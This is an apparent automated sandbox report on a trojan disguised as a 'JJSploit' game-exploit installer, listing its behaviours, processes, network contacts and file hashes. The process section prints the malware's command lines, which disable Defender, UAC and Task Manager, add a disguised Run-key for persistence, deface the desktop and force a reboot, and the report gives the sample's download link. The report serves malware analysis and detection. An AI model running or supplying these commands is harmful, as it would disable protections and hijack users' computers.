Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369& was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Disables Task Manager via registry modification
Downloads MZ/PE file
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
UPX packed file
Sets desktop wallpaper using registry
Subvert Trust Controls: Mark-of-the-Web Bypass
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies registry key
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
NTFS ADS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-20 20:44
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-20 20:44
Reported
2024-10-20 20:46
Platform
win11-20241007-en
Max time kernel
88s
Max time network
90s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\HorrorBob2.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\HorrorBob2.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\HorrorBob2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133739307073391615" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "147" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\HorrorBob2.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369&
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa1dccc40,0x7ffaa1dccc4c,0x7ffaa1dccc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2068,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2156,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2372 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4540,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4548 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa1dccc40,0x7ffaa1dccc4c,0x7ffaa1dccc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2076,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2220 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4364 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4428,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4248 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5008,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4284,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5220,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5232,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5376 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3316,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\HorrorBob2.exe
"C:\Users\Admin\Downloads\HorrorBob2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AD23.tmp\HorrorBob2.bat" "
C:\Windows\SysWOW64\cscript.exe
cscript prompt.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a33855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| GB | 142.250.179.238:443 | apis.google.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| GB | 216.58.201.110:443 | consent.google.com | udp |
| GB | 216.58.201.110:443 | consent.google.com | tcp |
| GB | 172.217.169.78:443 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 216.58.201.110:443 | consent.google.com | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| GB | 216.58.201.110:443 | consent.google.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
\??\pipe\crashpad_3140_OENMXFHLMWOEDRLI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | c88e5d9e1541984437dd3700b8d8be78 |
| SHA1 | 3566c9fbc3e79f557ba78b79af9b5a4ed5c8eef4 |
| SHA256 | 843adbc7b11bdc2503206c64fd5c364309fb1879088c14d003c4750a61b33a24 |
| SHA512 | 425ebf738beca1082ab20b0d97407589e26998bf40b6a58f24c9bc2c477adf2b3133fe79a7e54292232829a7be0ba34a85c249cc7649ed604a597eaf3cd6658f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 40fc3c871378d84b577bd616005d803d |
| SHA1 | f3b49159571fe90bd278fb949704537ce98a7d7e |
| SHA256 | ab83b09c2cf2e94b0b517d835d882eac8be78ed79dcd00409ead35841bb4afcf |
| SHA512 | caa4e224b4fd73efc5a7e18c8dd1b56264884c43d3aa7e98b8b5c22decd88a27e0f4b30b68488d64d4e5cfc4b2aff8e2178c45644dfdc6ae0fa2141002b88fd6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ff09fc7d1b8cc74a4fc081a7c3232b2b |
| SHA1 | acd4acc6a00fc2cdacf0f35430c470c7df77dca5 |
| SHA256 | b32bda6ded30a413692c4c505f29852f8d72121e3b3255f44d7de3150fad1ec8 |
| SHA512 | 90e3835f938b85de2e50f81dc8a4a1b277cd87428d3f4ad5179b5d6e9459221db19313349a4bb808f3c28a487dd848bd7a312bd8e0f232bd6b2b7bc0af45b1e1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 4c72725266187cd8c3a38de44e306c9f |
| SHA1 | 080a5391bd924777c787fa72aba5dfc1317db2b8 |
| SHA256 | 0d3e94496d7e6ae3d098e3c7c0c0b4b953b773c72ef6a247316cff3026166697 |
| SHA512 | 7a90a1ef1a9a80a9a5ef2a28a21a8b568e8fd9e26dfd23108260d4399da28e8e126794541169e2398fe2d4284ac3c53a9e5891763f26d7bc26c5c476e5c4f1ca |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
